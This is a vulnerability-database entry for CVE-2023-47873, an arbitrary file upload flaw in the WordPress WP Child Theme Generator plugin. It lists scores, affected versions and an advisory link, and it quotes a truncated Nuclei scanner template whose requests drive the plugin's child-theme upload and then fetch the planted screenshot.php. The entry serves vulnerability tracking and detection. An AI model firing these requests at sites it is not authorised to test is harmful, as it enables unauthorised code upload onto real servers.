CVE-2023-47873
published 2024-03-26CVE-2023-47873: Unrestricted Upload of File with Dangerous Type vulnerability in WEN Solutions WP Child Theme Generator.This issue affects WP Child Theme Generator: from n/a…
PriorityP352high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
EXPLOIT
EPSS
2.28%
80.9th percentile
Unrestricted Upload of File with Dangerous Type vulnerability in WEN Solutions WP Child Theme Generator.This issue affects WP Child Theme Generator: from n/a through 1.0.9.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wen_solutions | wp_child_theme_generator | n/a – 1.0.9 | — |
| wensolutions | wp_child_theme_generator | < 1.1.3 | 1.1.3 |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
WordPress WP Child Theme Generator < 1.1.3 - Arbitrary File Upload
nuclei·CVSS 7.2
CVE-2023-47873 [HIGH] WordPress WP Child Theme Generator < 1.1.3 - Arbitrary File Upload
WordPress WP Child Theme Generator
------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
Content-Disposition: form-data; name="wp-easy-nonce"
{{nonce}}
------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
Content-Disposition: form-data; name="action"
child_theme
------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
Content-Disposition: form-data; name="custom-child-create"
Create Child Theme
------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8--
matchers:
- type: dsl
dsl:
- 'status_code == 302'
- 'contains(location, "error_type=updated")'
condition: and
internal: true
- raw:
- |
GET /wp-content/themes/{{name}}/screenshot.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "{{string}}")'
condition: and
# digest: 4b0a00483046022
No writeups or analysis indexed.
https://patchstack.com/database/vulnerability/wp-child-theme-generator/wordpress-wp-child-theme-generator-plugin-1-0-8-arbitrary-file-upload-vulnerability?_s_id=cvehttps://patchstack.com/database/vulnerability/wp-child-theme-generator/wordpress-wp-child-theme-generator-plugin-1-0-8-arbitrary-file-upload-vulnerability?_s_id=cve
2024-03-26
Published